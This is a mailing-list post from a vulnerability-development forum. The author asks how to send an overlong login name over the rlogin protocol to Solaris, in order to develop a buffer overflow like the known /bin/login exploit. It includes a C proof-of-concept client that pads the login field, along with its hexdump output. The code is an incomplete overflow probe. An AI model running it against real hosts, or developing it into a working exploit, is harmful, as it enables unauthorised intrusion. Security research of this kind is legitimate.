Vulnerability Development mailing list archives
Problem rlogin protocol
From: Inode <inode () mediaservice net>
Date: Fri, 02 Apr 2004 15:33:02 +0200
Hi all,I'm playing with rlogin protocol under Solaris (but I think it's similar to others unix system), and I got some problems.
When I try to send a buffer more than 250 byte as login name the deamon will output 0x7 character (beep). I know that with telnet protocol there are options for permit to use long buffer without any problems (as in Solaris /bin/login exploit), how to do that with rlogin protocol?
Attached a little example that have this problem... Thanks. Best regards, Inode root# ./y 192.168.1.50 inode 2 [+] Connected to 192.168.1.50... /* start, 1 bytes */ 00 | . /* Reply, 1 bytes */ 00 | . /* Rlogin init, 23 bytes */ 69 6e 6f 64 65 00 69 6e 6f 64 65 00 76 74 31 30 | inode.inode.vt10 30 2f 39 36 30 30 00 | 0/9600. /* rec, 10 bytes */ 50 61 73 73 77 6f 72 64 3a 20 | Password: /* rec, 2 bytes */ 0d 0a | .. /* rec, 17 bytes */ 4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 63 74 0d | Login incorrect. 0a | . /* rec, 7 bytes */ 6c 6f 67 69 6e 3a 20 | login: /* rec, 10 bytes */ 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA /* rec, 10 bytes */ 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA /* rec, 2 bytes */ 0d 0a | .. /* rec, 10 bytes */ 50 61 73 73 77 6f 72 64 3a 20 | Password: root# root# ./y 192.168.1.50 inode 26 [+] Connected to 192.168.1.50... /* start, 1 bytes */ 00 | . /* Reply, 1 bytes */ 00 | . /* Rlogin init, 23 bytes */ 69 6e 6f 64 65 00 69 6e 6f 64 65 00 76 74 31 30 | inode.inode.vt10 30 2f 39 36 30 30 00 | 0/9600. /* rec, 10 bytes */ 50 61 73 73 77 6f 72 64 3a 20 | Password: /* rec, 2 bytes */ 0d 0a | .. /* rec, 17 bytes */ 4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 63 74 0d | Login incorrect. 0a | . /* rec, 7 bytes */ 6c 6f 67 69 6e 3a 20 | login: /* rec, 10 bytes */ 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA /* rec, 10 bytes */ 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA /* rec, 10 bytes */ 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA /* rec, 10 bytes */ 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA [...] 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA /* rec, 10 bytes */ 41 41 41 41 41 41 41 07 07 07 | AAAAAAA... /* rec, 1 bytes */ 07 | .
/* Inode_ <inode () deadlocks info> */ #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <arpa/telnet.h> #include <netdb.h> #include <fcntl.h> #include <errno.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> // Prototypes void hexdump (char *desc, unsigned char *data, unsigned int amount); int connect_m ( unsigned long ip, unsigned short int port); // Define #define RLOGIN_PORT 513 #define VERSION "0.00" unsigned int envcount= 0; void main(int argc, char ** argv) { int fd; char * host = argv[1]; char * username = argv[2]; int l; int i ; char buffer[4000]; char * pointer; int j; fprintf( stderr, "[ ] Connecting to %s...",host); fflush( stderr ); fd = connect_m ( ntohl((unsigned long)inet_addr(host)) , RLOGIN_PORT); if (fd <= 0) { fprintf (stderr, "\r[-] Error on connecting\n"); exit (EXIT_FAILURE); } fprintf( stderr, "\r[+] Connected to %s...\t\n",host); // Inizialize RLOGIN connection hexdump( "start", "\x00",1); write( fd, "\x00",1); // Receive data l = read( fd, buffer, sizeof(buffer)); hexdump( "Reply", buffer,l); // Prepare our data. Rlogin protocoll pointer = &buffer[0]; memcpy( pointer, username, strlen(username) + 1); pointer += strlen(username) + 1; memcpy( pointer, username, strlen(username) + 1); pointer += strlen(username) + 1; memcpy( pointer, "vt100/9600", strlen("vt100/9600") + 1); pointer += strlen("vt100/9600") + 1; l = pointer - &buffer[0]; hexdump( "Rlogin init", buffer, l); write( fd, buffer, l); l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); // Send a fake password sprintf( buffer, "sarca\n"); write( fd, buffer, strlen(buffer)); l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); // Read login incorrect l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); // Read login prompt l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); // Sending login overflow... buffer[0] = 0; for( i = 0; i < atoi(argv[3]); i++ ) { sprintf(buffer,"AAAAAAAAAA"); write( fd, buffer, strlen(buffer)); // Read output l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); } sprintf(buffer,"\n"); write( fd, buffer, strlen(buffer)); // Read output l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); // Read output l = read( fd, buffer, sizeof(buffer)); hexdump( " rec", buffer,l); close( fd ); } int connect_m (unsigned long ip, unsigned short int port) { int sock, flags, flags_old, retval, sock_len; struct sockaddr_in sin; struct timeval tv; fd_set rfds; struct sockaddr_in in_s; if( ( sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ) < 0){ fprintf(stderr, "Can't create socket try to decrase the number\ of threads...\n"); perror("socket"); return -1; } // Set connection varibles sin.sin_family = AF_INET; sin.sin_addr.s_addr = ntohl( ip ); sin.sin_port = htons( port ); // Bind to a port < 1024 (rlogin & rsh protocol) in_s.sin_addr.s_addr = INADDR_ANY; in_s.sin_family = AF_INET; in_s.sin_port = htons(1023); while( bind(sock, (struct sockaddr*)&in_s, sizeof(in_s)) != 0 ) { in_s.sin_port--; if( in_s.sin_port < htons(1) ) { fprintf(stderr, "Can't bind port <1024\n"); exit(0); } } // Set Non Blocking Socket flags_old = fcntl( sock, F_GETFL,0); flags = flags_old; flags |= O_NONBLOCK; fcntl( sock, F_SETFL, flags); // Connect if( connect(sock, (struct sockaddr*) &sin, sizeof(sin) ) == 0 ) return sock; // Set timeout tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&rfds); FD_SET(sock, &rfds); retval = select(FD_SETSIZE, NULL, &rfds, NULL, &tv); // if retval < 0 error if( retval < 0 ) { close( sock ); return -1; } sock_len = sizeof( sin ); // Check if port closed if( retval ) if( getpeername( sock, (struct sockaddr *) &sin, &sock_len) < 0 ) { close( sock ); return -1; } else { fcntl( sock, F_SETFL, flags_old); return sock; } close( sock ); return -1; } void hexdump (char *desc, unsigned char *data, unsigned int amount) { unsigned int dp, p; /* data pointer */ const char trans[] = "................................ !\"#$%&'()*+,-./0123456789" ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" "nopqrstuvwxyz{|}~...................................." "....................................................." "........................................"; printf ("/* %s, %u bytes */\n", desc, amount); for (dp = 1; dp <= amount; dp++) { fprintf (stderr, "%02x ", data[dp-1]); if ((dp % 8) == 0) fprintf (stderr, " "); if ((dp % 16) == 0) { fprintf (stderr, "| "); p = dp; for (dp -= 16; dp < p; dp++) fprintf (stderr, "%c", trans[data[dp]]); fflush (stderr); fprintf (stderr, "\n"); } fflush (stderr); } if ((amount % 16) != 0) { p = dp = 16 - (amount % 16); for (dp = p; dp > 0; dp--) { fprintf (stderr, " "); if (((dp % 8) == 0) && (p != 8)) fprintf (stderr, " "); fflush (stderr); } fprintf (stderr, " | "); for (dp = (amount - (16 - p)); dp < amount; dp++) fprintf (stderr, "%c", trans[data[dp]]); fflush (stderr); } fprintf (stderr, "\n"); return; }
Current thread:
- Problem rlogin protocol Inode (Apr 02)